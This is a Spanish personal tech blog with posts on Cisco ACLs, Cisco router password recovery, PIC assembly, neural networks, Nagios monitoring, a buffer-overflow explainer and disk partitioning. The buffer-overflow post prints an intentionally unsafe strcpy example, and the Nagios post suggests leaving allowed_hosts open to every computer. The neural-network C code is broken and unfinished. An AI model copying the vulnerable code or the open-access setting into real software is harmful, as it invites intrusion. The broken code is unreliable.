root@byka:/echo "BE FREE USE FREE SOFTWARE"

Sigue Campus Party Mèxico!!!!

2009-11-15T18:33:00.000-08:00

Flisol 2009 ESIME CULHUACAN

2009-01-16T16:05:00.000-08:00

Este año como todos los años estamos preparando el festival latinoamericano de Instalacion de software libre ,Habrab varias sedes , como sede Esime Culhuacan donde se llevara acabo varios talleres , platicas y hacerca de diversos temas de interes solbre Software Libre

en breve se daran las listas de los temas.

http://www.flisol.sectorweb.net/

Configuración de LISTAS ACL

2008-08-20T09:19:00.001-07:00

Proceso de configuración de ACL

El proceso de creación de una ACL se lleva a cabo creando la lista y posteriormente asociándola a una interfaz entrante o saliente.
Configuración de ACL estándar

Router(config)#access-list[1-99][permit|deny][dirección de origen][mascara comodín]

Donde:

1-99 Identifica el rango y la lista.

Cuando se configura un router se debe identificar de forma exclusiva asignando un numero a la acl del protocolo cuando se usa un numero para identificar una ACL el numero debe de estar dentro del rango de numeros especificos de numeros que es valido para el protocolo

ip 1-99
ip extendida 100-199
apple talk 600-699
ipx 800-899
ipx extendido 900-999
protocolo de publicacion de servicio ipx 1000-1099

Permit|deny indica si esta entrada permitirá o bloqueará el tráfico a partir de la dirección especificada.

Dirección de origen identifica la dirección IP de origen.

Mascara comodín o wildcard identifica los bits del campo de la dirección que serán comprobados.

La mascara predeterminada es 0.0.0.0 (coincidencia de todos los bits).
Asociación de la lista a una interfaz

Router(config-if)#ip access-group[nº de lista de acceso][in|out]

Donde:

Número de lista de acceso indica el número de lista de acceso que será aplicada a esa interfaz.

In|out selecciona si la lista de acceso se aplicará como filtro de entrada o de salida.
Ejemplo de una ACL estándar denegando una red:

Router#configure terminal
Router(config)#access-list 10 deny 192.168.1.0 0.0.0.0
Router(config)#access-list 10 permit any
Router(config)#interface serial 0
Router(config-if)#ip access-group 10 in

Se ha denegado al host 192.168.1.0 y luego se ha permitido a cualquier origen,
Posteriormente se asocio la ACL a la interfaz Serial 0.
Configuración de ACL extendida

El proceso de configuración de una ACL IP extendida es el siguiente:

Router(config)#access-list[100-199][permit|deny][protocol][dirección de origen][mascara comodín][dirección de destino][mascara de destino][puerto][establisehed][log]
100-199 identifica el rango y número de lista
Permit|deny: indica si la entrada permitirá o bloqueara la dirección especificada.
Protocolo: como por ejemplo IP, TCP, UDP, ICMP

Dirección origen y destino: identifican direcciones IP de origen y destino.

Mascara wildcard origen y mascara destino: Son las mascaras comodín. Las 0 indican las posiciones que deben coincidir, y los 1 las “que no importan”.

Puerto:(opcional) puede ser por ejemplo: lt (menor que), gt (mayor que), eq (igual a), o neq (distinto que) y un número de puerto de protocolo correspondiente.

Establisehed: (opcional) Se usa solo para TCP de entrada. Esto permite que él rafico TCP pase si el paquete utiliza una conexión ya establecida (por ejemplo posee un conjunto de bits ACK)

Log: (opcional) Envía un mensaje de registro a la consola a un servidor syslog determinado.

Algunos de los números de puertos más conocidos:

20 Datos del protocolo FTP
21 FTP
23 Telnet
25 SMTP
69 TFTP
53 DNS

Asociación de la lista a una interfaz

Router(config-if)#ip access-group[nº de lista de acceso][in|out]

Donde:

Número de lista de acceso indica el número de lista de acceso que será aplicada a esa interfaz.

In|out selecciona si la lista de acceso se aplicará como filtro de entrada o de salida.

Ejemplo de una ACL Extendida denegando un host hacia el puerto 80 de una red:

Router(config)#access-list 120 deny tcp host 204.204.10.1 any eq 80
Router(config)#access-list 120 permit ip any any
Router(config)#interface serial 1
Router(config-if)#ip access-group 120 in

Se ha denegado al host 204.204.10.1, (identificándolo con la abreviatura “host”) hacia el puerto 80 de cualquier red de destino (usando el termino any). Posteriormente se permite todo trafico IP. Esta ACL se asocio a la interfaz Serial 1 como entrante.
Aplicación de una ACL a la linea de telnet

Para evitar intrusiones no deseadas en las conexiones de telnet se puede crear una
lista de acceso estándar y asociarla a la Line VTY. El proceso de creación se lleva a cabo como una ACL estándar denegando o permitiendo un origen hacia esa interfaz. El modo de asociar la ACL a la Línea de telnet es el siguiente:

router(config)#line vty 0 4
router(config-line)#access-class[Nº de lista de acceso][in|out]

Como eliminar las listas de acceso

Desde el modo interfaz donde se aplico la lista:

Router(config-if)#no ip access-group[Nº de lista de acceso]

Desde el modo global elimine la ACL

router(config)#no access-list[Nº de lista de acceso]

Recover Paaasswooordddd CISCO

2008-08-20T09:00:00.000-07:00

(Primera parte)

La recuperación de contraseñas le permite alcanzar el control administrativo de su dispositivo si ha perdido u olvidado su contraseña. Para lograr esto necesita conseguir acceso físico a su router ingresar sin la contraseña, restaurar la configuración y reestablecer la contraseña con un valor conocido.
El orden del proceso para la recuperación de contraseña es el siguiente:

Para router Cisco
• serie 2000.
• serie 2500.
• serie 3000.
• serie 4000 con una CPU Motorola 680×0.
• serie 7000 ejecutando Cisco IOS versión 10.0 o posterior

Siga estos pasos:

Paso 1
Conecte un terminal o PC con software de emulación de terminal al puerto de consola del router. Acceda físicamente al router, apague y encienda el router.

Paso 2
Pulse la tecla de interrupción del terminal durante los primeros sesenta segundos del encendido del router. En el caso de Hyperterminal la combinación del control+pausa dará la señal de interrupción en el router.
Aparecerá el símbolo> sin nombre del router. Si no aparece el símbolo, el terminal no esta enviando la señal de interrupción correcta.

Paso 3
Introduzca el comando o/r 0×2142 (o/r orden de registro) para arrancar desde la memoria Flash.

Paso 4
En el símbolo >, introduzca el comando i (initialize) para reiniciar el router. Esto hace que el router se reinicie pero ignore la configuración grabada en la NVRAM.
Paso 5
Siga los pasos de arranque normales. Aparecerá el símbolo router>.
Paso 6
La memoria RAM estará vacía, copie el contenido de la NVRAN a la RAM. De esta manera recuperara la configuración y también la contraseña no deseada. El nombre de router volverá a ser el original.

Router#copy startup-config running-config
MADRID#

Paso 7
Cambie la contraseña no deseada por la conocida:

MADRID#configure terminal
MADRID (config-if)#enable secret “Nueva contraseña”

Paso 8
Guarde su nueva contraseña en la NVRAM, y si fuera necesario levante administrativamente las interfaces con el comando no shutdown:

MADRID#copy running-config startup-config

Paso 9
Introduzca desde el modo global el comando config-register 0×2102

Paso 10
Introduzca el comando reload en el símbolo del nivel EXEC privilegiado. Responda yes a la pregunta y confirme el reinicio:

Router#reload

System configuration has been modified. Save? [yes/no]: yes
Building configuration…
[OK]
Proceed with reload? [confirm]

Listas de Acceso CISCO

2008-08-19T15:33:00.000-07:00

Desde la primera vez que se conectaron varios sistemas para formar una red, ha existido una necesidad de restringir el acceso a determinados sistemas o partes de la red por motivos de seguridad, privacidad y otros. Mediante la utilización de las funciones de filtrado de paquetes del software IOS, un administrador de red puede restringir el acceso a determinados sistemas, segmentos de red, rangos de direcciones y servicios, basándose en una serie de criterios. La capacidad de restringir el acceso cobra mayor importancia cuando la red de una empresa se conecta con otras redes externas, como otras empresas asociadas o Internet.

Administración basica del trafico IP
Los router se sirven de las listas de control de acceso (ACL) para identificar el tráfico.
Esta identificación puede usarse después para filtrar el tráfico y conseguir una mejor administración del tráfico global de la red. Las listas de acceso constituyen una eficaz herramienta para el control de la red. Las listas de acceso añaden la flexibilidad necesaria para filtrar el flujo de paquetes que entra y sale de las diferentes interfaces del router.

El filtrado de paquetes permite controlar el movimiento de estos dentro de la red. Este control puede ayudar a limitar él tráfico originado por el propio router.

Una lista de acceso IP es un listado secuencial de condiciones de permiso o prohibición que se aplican a direcciones IP o a protocolos IP de capa superior. Las listas de acceso identifican tráfico que ha de ser filtrado en su transito por el router, pero no pueden filtrar él trafico originado por el propio router.

Las listas de acceso pueden aplicarse también pueden aplicarse a los puertos de líneas de terminal virtual para permitir y denegar trafico Telnet entrante o saliente, no es posible bloquear el acceso Telnet desde el mismo router.
Se pueden usar listas de acceso IP para establecer un control más fino o la hora de separar el tráfico en diferentes colas de prioridades y personalizadas. Una lista de acceso también pueden utilizarse para identificar el tráfico “interesante” que sirve para activar las llamadas del enrutamiento por llamada telefónica bajo demanda (DDR). Las listas de acceso son mecanismos opcionales del software Cisco IOS que pueden ser configurados para filtrar o verificar paquetes con el fin de determinar si deben ser retransmitidos hacia su destino, o bien descartados.

Cuando un paquete llega a una interfaz, el router comprueba si el paquete puede ser retransmitido verificando su tabla de enrutamiento. Si no existe ninguna ruta hasta la dirección de destino, el paquete es descartado. A continuación, el router comprueba si la interfaz de destino esta agrupada en alguna lista de acceso. De no ser así, el paquete puede ser enviado al búfer de salida. Si el paquete de salida está destinado a un puerto, que no ha sido agrupado a ninguna lista de acceso de salida, dicho paquete será enviado directamente al puerto destinado. Si el paquete de salida está destinado a un puerto ha sido agrupado en una lista de acceso saliente, antes de que el paquete pueda ser enviado al puerto destinado será verificado por una serie de instrucciones de la lista de acceso asociada con dicha interfaz. Dependiendo del resultado de estas pruebas, el paquete será admitido o denegado.
Para las listas salientes un permit significa enviar al búfer de salida, mientras que deny se traduce en descartar el paquete.
Para las listas entrantes un permit significa continuar el procesamiento del paquete tras su recepción en una interfaz, mientras que deny significa descartar el paquete.
Cuando se descarta un paquete IP, ICMP devuelve un paquete especial notificando al remitente que el destino ha sido inalcanzable.
Prueba de las condiciones de una ACL

Las instrucciones de una lista de acceso operan en un orden lógico secuencial. Evalúan los paquetes de principio a fin, instrucción a instrucción. Si la cabecera de un paquete se ajusta a una instrucción de la lista de acceso, el resto de las instrucciones de la lista serán omitidas, y el paquete será permitido o denegado según se especifique en la instrucción competente.
Si la cabecera de un paquete no se ajusta a una instrucción de la lista de acceso, la prueba continua con la siguiente instrucción de la lista.
El proceso de comparación sigue hasta llegar al final de la lista, cuando el paquete será denegado implícitamente.

Una vez que se produce una coincidencia, se aplica la opción de permiso o denegación y se pone fin a las pruebas de dicho paquete. Esto significa que una condición que deniega un paquete en una instrucción no puede ser afinada en otra instrucción posterior.

La implicación de este modo de comportamiento es que el orden en que figuran las instrucciones en la lista de acceso es esencial. Hay una instrucción final que se aplica a todos los paquetes que no han pasado ninguna de las pruebas anteriores. Esta condición final se aplica a todos esos paquetes y se traducen en una condición de denegación del paquete.
En lugar de salir por alguna interfaz, todos los paquetes que no satisfacen las instrucciones de la lista de acceso son descartados.
Esta instrucción final se conoce como la denegación implícita de todo, al final de cada lista de acceso. Aunque esta instrucción no aparece en la configuración del router, siempre esta activa. Debido a dicha condición, es necesaria que en toda lista de acceso exista al menos una instrucción permit, en caso contrario la lista de acceso bloquearía todo el tráfico.

MICROCONTROLADOR PIC16F84A ENSAMBLADOR

2008-04-07T19:49:00.000-07:00

ANALIZEMOS LAS SIGUIENTES SUBRUTINAS. RESPUESTA VERDADERO =1 o FALSO=0;

INICIO MOVF TIEMPO,F->MUEVE TIEMPO A F
BTFSS STATUS,Z->CHECA EL BIT Z DE STATUS SI 1 SALTA
GOTO ESHORA
MOVLW 0X59
MOVWF TIEMPO
GOTO INICIO
ESHORA CALL RET1SEG; llamado al retarno de 12 seg
DECF TIEMPO,F;segundo
GOTO INICIO

A)la rutina incrementa la variable TIEMPO cada segundo hasta que alcanza el valor de 0X59 cuando esto ocurre la variable TIEMPO es puesta a 0
FALSO

MOVLW D'12'
MOVWF FSR
CALL BUCLE
FIN GOTO FIN
BUCLE CLRF INDF
BTFSC FSR,6-> AQUI SALTA A INCF HASTA QUE LLEGA A 64
RETURN
INCF FSR,F
GOTO BUCLE

B)ESTA RUTINA PONE EN CERO LAS LOCALIDADES DE MEMORIA RAM DE LA OXOC A LA OX4O

SI CONVERTIMOS A HEXADEDECIMAL CARGAMOS A W CON OXOC DE AHI SE VA HA UN BUCLE HASTA QUE EL BIT 6 DE FSR ESTE EN 0 OSEA Y LLEGARA A 64 BORRANDO ESTAS LOCALIDADE DE MEMORIA

VERDADERO

FLISOL 2008 ASISTAN

2008-04-04T22:47:00.000-07:00

http://www.flisol.org.mx/

El FLISOL es el evento de difusión de Software Libre más grande en Latinoamérica. Se realiza desde el año 2005 y su principal objetivo es promover el uso del Software Libre, dando aconocer al público en general su filosofía, alcances, avances y desarrollo. Para tal fin, las diversas comunidades locales de software libre (en cada país, en cada ciudad/localidad), organizan simultáneamente eventos en los que se instala, de manera gratuita y totalmente legal, software libre en las computadoras que llevan los asistentes. Además, en forma paralela, se ofrecen charlas, ponencias y talleres, sobre temáticas locales, nacionales y latinoamericanas en torno al Software Libre, en toda su gama de expresiones: artística, académica, empresarial y social.

El FLISOL 2008 se llevará a cabo el sábado 26 de abril.

2008-04-03T23:07:00.001-07:00

Redes neuronales:

Este tipo de redes no ayudaran a renocer patrones se pueden desarrollar sistemas de reconicimiento de voz imagenes y otras aplicaciones interesante para ello posteo la teoria por que si no despues no sabemos que estamos programando.

consisten de varios elementos de proceso interconectados, los cuales afectan un proceso determinado en forma paralela y transmiten su resultado a través de un canal unidireccional.

neurona o Unidad: Elemento básico de las redes neuronales, la cual realiza su propio proceso usando información que recibe de otras neuronas y el resultado lo transmite hacia otros.

Función de transferencia: También llamada función de activación, es una función que se usa dentro de una neurona, esta es generalmente no-lineal.

Peso de conexión: Es el valor que se asigna al canal unidireccional, éste valor decide la impedancia de la conexión o el valor de su fuerza.

Capas: Las neuronas se pueden conectar en cascada en este caso se generan capas।
*
funciones

La clasificación de las redes neuronales.

Redes Fijas

Red de Hopfield
Red DE Hamming
BAM (Bidirectional Asociative Memory)
LAM (Lineal Asociaive Memory)

Redes adaptables

Con supervisión Sin supervisión

Kohonen
Neocognitron
ART

Adaline
Madaline
Perceptrón
Multi – perceptrón
Back - propagation

la estructura y las diferencias de las redes neuronales vistas en ESTE POST , además los problemas de estabilidad de las redes fijas.

Diferencias entre redes neuronales

BAM es bidireccional, y sus pares de vectores pueden tener distinta longitud

LAM es unidireccional, y sus pares de vectores deben tener longitud igual

Hopfield se itera hasta que la red converge y existe retroalimentación

Las redes fijas solo calcularán matriz de correlación entre los vectores a entrenar y calcularán su salida, si la red reconoce esta bien y si no reconoce también

entrada -> renocimiento -> salida

Estructura de las Redes NEURONALES

* diagramas

ahora el codigo!!!!!!!!

*************************************************************************************
/***************************************************************************
* Copyright (C) 2008 by Jonathan,,, *
* ekxo@victoria *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the *
* Free Software Foundation, Inc., *
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
***************************************************************************/

#include
#include
int Nvectores[Nelementos],Nelementos,fila;
int vect[

main (){

printf("\n\nEsta es una RED LAM\n\n");
printf("Ingresa el numero de Vectores a Aprender\n");
scanf("%d",&Nvectores);
if (Nvectores =! 0) else printf("Falta ingresar Vector");
printf("Ingresa el numero de elementos de cada Vector\n\n");
scanf("%d",&Nelementos);
for (fila=1;fila=Nvectores;fila++);
vect(fila,:) = input('') %Ingresa vectores

}
exit(EXIT_SUCCESS);

NOTA :TODAVIA NO TERMINO EL CODIGO..

MONITOREO DE SERVIDORES LINUX CON NAGIOS

2008-03-31T13:33:00.000-07:00

MONITOREO DE SERVIDORES LINUX CON SOIGAN..

Este documento describe cómo podemos monitorear servicios y atributos “privados” de los servidores de Linux/UNIX, por ejemplo:

Carga de la CPU
Uso de la memoria
Uso del disco
Utilizadores entrados
Procesos corrientes
etc.

Los servicios disponibles que son proporcionados por los servidores de Linux (HTTP, ftp, SSH, smtp, etc.) pueden ser monitoreados fácilmente siguiendo la documentación en Monitorear servicios disponibles.

Debemos tener en cuanta que tenemos que configurara (commands.cfg, templates.cfg, etc.) que están instalados.

Leer addon de NRPE para las instrucciones de cómo monitorear un servidor alejado de Linux/Unix.]

Hay varias diversas maneras de vigilar atributos o los servidores alejados de Linux/Unix. Uno está usando los claves compartidos de SSH y el check_by_ssh plugin para ejecutar plugins en los servidores alejados. Este método no será cubierto aquí, sino puede dar lugar a alta carga en tu servidor que monitorea si tienes centenares o millares de servicios MONITOREANDO. Los gastos indirectos las conexiones de SSH de la creación/destruccion son la causa de esto.

Otro método común de como monitorear los ordenadores principal alejados de Linux/Unix es utilizar el addon de NRPE. NRPE permite que usted ejecute plugins en los ordenadores principal alejados de Linux/Unix. Esto es útil si necesitaS vigilar recursos/atributos locales como uso del disco, carga de la CPU, uso de la memoria, el etc. en un ordenador principal alejado.

Introducción

“addons” que están disponibles para Nagios. los addons se pueden utilizar para ampliar las funciones de Nagios o para integrar Nagios con otras aplicaciones.

Los addons están disponibles para:

El manejo de los config clasifía a través de un interfaz del Web
Vigilando los ordenadores principal alejados (*NIX, Windows, etc.)
Someter chequeos de la voz pasiva de los ordenadores principal alejados
Simplificacion/ampliacion de la lógica de notificación
… y mucho más

Puedes encontrar muchos addons para Nagios visitando:

NRPE

NRPE es un addon que permite ejecutar plugins en los ordenadores principal alejados de Linux/Unix. Esto es útil si necesitas vigilar recursos/atributos locales como uso del disco, carga de la CPU, uso de la memoria, el etc. en un ordenador principal alejado. Las funciones similares pueden ser logradas usando el check_by_ssh plugin, aunque pueden imponer una carga más alta de la CPU ante la máquina que vigila - especialmente si usted está vigilando a centenares o a millares de ordenadores principal.

El addon y la documentación de NRPE se pueden encontrar en http://www.nagios.org/.

NSCA

NSCA es un addon que permite que usted envíe resultados pasivos del cheque de los ordenadores principal alejados de Linux/Unix al demonio de Nagios que se ejecuta en el servidor que vigila. Esto es muy útil en el modo distribuido y redundant/failover

NDOUtils

NDOUtils es un addon que permite que usted salve toda la información de estatus de Nagios en una base de datos de MySQL. Esto servirá probablemente como la base para un nuevo interfaz PHP-basado del Web para Nagios en el futuro.

El addon y la documentación de NDOUtils se pueden encontrar en http://www.nagios.org/.

Monitoreo de MAquinas WINDOWS(SUCKS) con NAGIOS

2008-03-31T10:18:00.000-07:00

Describo cómo podemos monitorear servicios y atributos “privados” de las máquinas de Windows, por ejemplo:

Uso de la memoria
Carga de la CPU
Uso del disco
Mantenga los estados
Procesos corrientes
etc.

Los servicios disponibles que son proporcionados por las máquinas de Windows (HTTP, ftp, POP3, etc.) pueden ser vigilados fácilmente siguiendo la documentación en vigilar servicios publicos disponibles.

Descripción

Monitorear servicios privados de una máquina de Windows requiere que instalemos agente en él. Este agente actúa como proxy entre el plugin de Nagios que hace vigilar y el servicio o el atributo real de la máquina de Windows. Sin la instalación de un agente en el rectángulo de Windows, Nagios no podría vigilar servicios o los atributos privados del Windows.

Por este ejemplo, instalaremos el addon de NSClient++ en la máquina de Windows y utilizaremos el check_nt plugin para comunicarnos con el addon de NSClient++. El check_nt plugin se debe instalar ya en el servidor de Nagios si.

Otros agentes de Windows (como NC_Net) se podrían utilizar en vez de NSClient++ si quieres - proporcionado le definiciones del comando y del servicio del cambio, el etc. un dígito binario. Por simplicidad cubriré solamente con el addon de NSClient++ en estas instrucciones.

Hay varios pasos que necesitamos seguir para vigilar una máquina nueva de Windows.

Son:

Instalar un agente que vigila en la máquina de Windows
Cree el nuevo ordenador principal y mantenga las definiciones para vigilar la máquina de Windows
Reinicie el demonio de Nagios

Al momento de la instalacion

Para hacer la vida más fácil, algunas tareas de la configuración se han hecho ya para ti:

Una definición de comando del check_nt se ha agregado al fichero de commands.cfg. Esto permite que usted utilice el check_nt plugin para vigilar servicios de la ventana.
Un modelo servidor de Windows se ha creado ya en el fichero de templates.cfg. Esto permite que usted agregue nuevas definiciones del Windows de una manera simple.

Los ficheros antes dichos de los config se pueden encontrar en el directorio de /usr/local/nagios/etc/objects/. Tu puedes modificar las definiciones en éstos y otras definiciones para satisfacer las necesidades de tu red.

Requisitos previos

La primera vez que usted configura Nagios para vigilar una máquina de Windows, Necesitará hacer un poco trabajo adicional. necesitaras solamente hacer esto para la máquina de Windows.

Corrija el fichero principal de los config de Nagios.

VI /usr/local/nagios/etc/nagios.cfg

Decoimenta de la línea siguiente en el fichero principal de la configuración:

#cfg_file=/usr/local/nagios/etc/objects/windows.cfg

¿Qué usted hiciste con esto? Usted dijo Nagios que mire en el fichero a /usr/local/nagios/etc/objects/windows.cfg para encontrar definiciones adicionales del objeto. Aquí es donde agregarás el ordenador principal de Windows, Que el fichero de la configuración contiene ya algún ordenador principal de la muestra, hostgroup, y definiciones del servicio. Para la máquina de Windows , usted puede modificar simplemente el ordenador principal de la muestra y mantener definiciones en ese fichero, o más bien que crear nuevos.

Instalación del agente de Windows

Antes de que podamos comenzar a vigilar servicios y atributos privados de las máquinas de Windows, usted necesitará instalar un agente en esas máquinas. Recomiendo el usar del addon de NSClient++, que se puede encontrar en http://sourceforge.net/projects/nscplus. Estas instrucciones le tomarán a través de una instalación básica del addon de NSClient++, tan bien como la configuración de Nagios para monitorerar la máquina de Windows.

1. Descargue la versión estable más última del addon de NSClient++ de http://sourceforge.net/projects/nscplus

2. Descomprima los ficheros de NSClient++ en un nuevo directorio de C:\NSClient ++

3. Abra una concloca de comando y cambiate al directorio C:\NSClient ++

4. Coloca el servicio de sistema de NSClient++ con el comando siguiente:

 nsclient++ /install

5. Instale el NSClient++ systray con el comando siguiente (“SysTray” es caso-sensible):

 nsclient++ SysTray

6. Abre el adminsitrador de servicios y cerciórate de que el servicio de NSClientpp está permitido para trabajar recíprocamente con el escritorio (véase la tabulación de la “conexión” del administrador de servicios).

7. Modifica el fichero de NSC.INI (situado en el directorio de C:\NSClient ++) y realice los cambios siguientes:

Uncomment que todos los módulos enumerados en la sección [de los módulos], a excepción de CheckWMI.dll y de RemoteConfiguration.dll
Requerias opcionalmente de un password de paso para los clientes cambiando la opción de la “palabra password” en la sección [de las configuraciones].
Uncomment la opción de los “allowed_hosts” en la sección [de las configuraciones]. Agregue la IP address del servidor de Nagios a esta línea, o déjalo en blanco para permitir que todos los ordenadores se conecten.
Cerciórate de que sea la opción “port” en la sección [de NSClient] uncommented y fijara a “12489” (el acceso del valor esta pore defecto por defecto).
podemos estar seguros de que el puerto esta abierto y en ecucha con nmap -p 12489 ip-windows

8. Comience el servicio de NSClient++ con el comando siguiente:

 nsclient++ /start

9. Si está instalado correctamente, un nuevo icono debe aparecer en su bandeja del sistema. Será un círculo amarillo con un “M negro” adentro.

10. ¡Éxito! El servidor de Windows se puede ahora agregar al Nagios.

Nagios configuración

Ahora es hora de definir algunas definiciones del objeto en sus ficheros de la configuración de Nagios para vigilar la máquina nueva de Windows.

Abra el fichero de windows.cfg para corregir.

VI /usr/local/nagios/etc/objects/windows.cfg

Agregue una nueva definición para la máquina de Windows que vamos a monitorear. Si ésta es la máquina de Windows podemos modificar simplemente la definición del ordenador principal de la nuestro archvio windows.cfg. Cambie los dastos necesarios y los campos de direccionamiento a los valores apropiados para el host windows.

defina el ordenador principal {
uso  ventana-servidor ; Herede los valores por defecto de un modelo del servidor de Windows (se cerciora de usted mantiene esta línea!)
host_name  winserver
alias  Mi servidor de Windows
direccionamiento  192.168.1.2
}

Bueno. Ahora podemos agregar algunas definiciones del servicio (al mismo fichero de la configuración) para decirle a Nagios que diversos aspectos de la máquina de Windows va a vigilar. Si ésta es la máquina de Windows que usted está vigilando, puedes modificar simplemente las definiciones del servicio de la muestra en windows.cfg.

Nota: Substituya el “winserver” en las definiciones del ejemplo abajo por el nombre que usted especificó en la directiva del host_name de la definición del ordenador usted acaba de agregar.

Agregue la definición siguiente del servicio para vigilar la versión del addon de NSClient++ que se está ejecutando en el servidor de Windows. Esto es útil cuando viene la hora de aumentar sus servidores de Windows a una más nueva versión del addon,

defina el servicio {
uso   genéric-servicio
host_name   winserver
service_description Versión de NSClient++
check_command  ¡check_nt! CLIENTVERSION
}

Agregue la definición siguiente del servicio para vigilar el uptime del servidor de Windows.

defina el servicio {
uso   genérico-servicio
host_name   winserver
service_description Uptime
check_command  ¡check_nt! UPTIME
}

Agregue la definición siguiente del servicio para vigilar la utilización de la CPU en el servidor de Windows y para generar una alarma CRÍTICA si la carga minuciosa de la CPU 5 es el 90% o más o una alarma si la carga minuciosa 5 es el 80% o mayor.

defina el servicio {
uso   genérico-servicio
host_name   winserver
service_description Carga de la CPU
check_command  ¡check_nt! ¡CPULOAD! - l 5.80.90
}

Agregue la definición siguiente del servicio al uso de la memoria del server Windows y genere una alarma CRÍTICA si el uso de la memoria es el 90% o más o una alarma warnig si el uso de la memoria es el 80% o mayor.

defina el servicio {
uso   genérico-servicio
host_name   winserver
service_description Uso de la memoria
check_command  ¡check_nt! ¡MEMUSE! - W 80 - c 90
}

Agregue la definición siguiente del servicio al uso de C:\ en el servidor de Windows y genere una alarma CRÍTICA si el uso del disco es el 90% o más o una alarma warnig si el uso del disco es el 80% o mayor.

defina el servicio {
uso   genérico-servicio
host_name   winserver
service_description espacio del mecanismo impulsor de C:\
check_command  ¡check_nt! ¡USEDDISKSPACE! - l c - W 80 - c 90
}

Agregue la definición siguiente del servicio para vigilar el estado del servicio de W3SVC en la máquina de Windows y para generar una alarma CRÍTICA si se para el servicio.

defina el servicio {
uso   genérico-servicio
host_name   winserver
service_description W3SVC
check_command  ¡check_nt! ¡SERVICESTATE! - d SHOWALL - l W3SVC
}

Agregue la definición siguiente del servicio para vigilar el proceso de Explorer.exe en la máquina de Windows y para generar una alarma CRÍTICA si el proceso no se está ejecutando.

defina el servicio {
uso   genérico-servicio
host_name   winserver
service_description Explorador
check_command  ¡check_nt! ¡PROCSTATE! - d SHOWALL - l Explorer.exe
}

Eso es él para ahora. Has agregado algunos servicios básicos que se deben vigilar en el rectángulo de Windows. Excepto el fichero de la configuración.

Protección de password

Si usted especificó una palabra de paso en el fichero de la configuración de NSClient++ en la máquina de Windows, usted necesitará modificar la definición de comando del check_nt para incluir la palabra de paso. Abra el fichero de commands.cfg para corregir.

VI /usr/local/nagios/etc/commands.cfg

Cambia la definición del comando del check_nt para incluir “- el argumento del de s” (donde está la palabra de paso la "password que especificaste en la máquina de Windows) como esto:

defina el comando {
command_name check_nt
command_line $USER1$/check_nt - H $HOSTADDRESS$ - p 12489 - "PALABRA DE PASO" de s - v $ARG1$ $ARG2$
}

Reinicia Nagios

verifica tus ficheros de configuración y reinicia Nagios.

Si el proceso de la verificación produce cualesquiera mensajes de errores, fijate en tu su fichero de configuración antes de continuar. ¡Cerciórate de que allas reiniciado (reinicia) Nagios hasta que el proceso de la verificación termina sin ningun error!

¿que es un buffer overflow ?

2008-03-10T12:56:00.000-07:00

Este desbordamiento es posible porque el autor del programa no incluyó el código necesario para comprobar el tamaño y capacidad del buffer en relacion con el tamaño de datos que tiene que alojar.

Los problemas comienzan cuando el exceso de datos se escribe en otras posiciones de memoria, con la perdida de los datos anteriores.

EJEMPLO:
#include
#include

int main(int argc, char *argv[])
{
char buffer[10];
if (argc < 2)
{
fprintf(stderr, "MODO DE USO: %s string\n", argv[0]);
return 1;
}
strcpy(buffer, argv[1]);
return 0;
}

Si entre los datos perdidos por la sobreescritura se encuentran rutinas o procedimientos necesarios para el funcionamiento del programa que estamos ejecutando, el programa dará error.
Cuando la memoria de un programa llega a sobreescribir en forma aleatoria, el programa generalmente se colgará.

El problema para la seguridad nace cuando este desbordamiento de buffer es provocado intencionalmente por alguien mediante envio de datos que incluyen porciones de código, calculando la cantidad de datos para poder predeterminar cual es el sobrante que se va a sobreescribir y donde. Provocado el desbordamiento, contienen una instrucción que apunta a una posición de memoria distinta, donde se encuentra el codigo ejecutable enviado por el atacante.

El programa, inducido a funcionar anormalmente por la perdida de datos causada por el desbordamiento, ejecutará el código enviado por el atacante. esta chido !!NO

El buffer overflow es un problema de código defectuoso, por lo tanto como usuarios nada podemos hacer para evitarlo (salvo que ademas de usuarios seamos expertos programadores, y dispongamos del codigo fuente de la aplicacion que sufre el desbordamiento). En realidad el unico remedio es estar informado de los programas que sufren estos problemas, y tener el software actualizado.

Instalación de un disco duro adicional Una experiencia práctica

2008-03-10T11:39:00.000-07:00

Instalación de un disco duro adicional
Una experiencia práctica
Todo el mundo sabe que Linux nos permite dar vida a equipos obsoletos que ya no servirian para echar
a andar otros, s.o más exigentes y no por ello mejores. En mi caso pude montar un pequeño case pero el
problema es que la particion de var esta muy chica asi que hubo que ponerle un usb con el objetivo de
emular un disco duro , y cambiar el punto de montaje asi el nuervo dispositivo sin que el sistema se
afecta ya que si cometemos algun error en esta particion el sistema queda inestable o irreparable.hay
que tener mucho cuidado al hacerlo .OK posteo los pasos que segui para hacerlo.
Lo primero que hice fué mirar como estaba particionado mi nuevo disco, como lo había montado como
esclavo
bastó hacer un :
fdisk /dev/sda1
Así que la primera cosa a hacer fué eliminar las particiones que no me servían y crearlas de nuevo. Las
intrucciones:
fdisk /dev/sda1
d #borrar una partición
n #nueva partición
W #escribir tabla de particiones
Cuando entras en fdisk, tecleando m puedov er la lista de opciones disponibles.
Sobretodo hay que ir muy alerta con no equivocarse con los dispositivos ya que nos podemos cargar la
tabla de particiones del disco bueno. Una vez hemos particionado el disco el sistema me pidió reiniciar
( adios a mi uptime, pero de todas formas uno no particiona el disco todos los días ).
Una vez creadas las dos pariticiones que me interesaban /dev/sda1 de 512mb elsiguiente paso fué crear
el sistema de archivos:
mkfs.ext3 /dev/sda1
Ahora ya tenía mi disco casi a punto. Mi intención era poner el contenido del directorio var en la
partición de 512mb.
Una vez ya tenemos las particiones creadas y formateadas se puede decir que ya tenemos hecha la parte
más complicada. Ahora solo nos queda mover la información entre particiones y asegurarnos de no
perder nada en el camino. Lo primero que hice fué montar la particion para poder pasar los archivos.
mkdir /mnt/p1
mount /dev/sda1 /mnt/p1
Casi ya lo tenía. Es siguiente paso fué mover todo el contenido del directorio /var a /mnt/p1 .Para eso
utilicé el midnight commander ( mc ) ¿ qué esperabais ? me gusta tener las dos ventanas y dejar que mc
me pida como y qué quiero copiar.El caso de var era un poco más complejo ya que equivocarme
equivaldría a dejar el sistema inestable o irreparable así que decidí curarme en salud y dejarlo, por si
